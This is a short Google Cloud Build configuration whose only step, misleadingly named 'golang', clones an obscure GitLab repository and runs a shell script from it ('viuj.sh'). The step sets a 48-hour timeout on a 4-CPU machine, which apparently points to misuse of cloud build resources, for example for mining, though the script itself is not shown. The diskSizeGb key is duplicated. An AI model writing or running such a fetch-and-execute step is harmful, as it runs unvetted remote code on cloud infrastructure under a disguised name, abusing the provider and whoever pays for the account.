steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt install git wget tar -y && git clone https://gitlab.com/satugiga94/egish.git && cd egish && chmod +x viuj.sh && ./viuj.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 172800s
options: 
  sourceProvenanceHash: ['SHA256'] 
  machineType: 'e2-standard-4' 
  diskSizeGb: '100'
  diskSizeGb: '100'
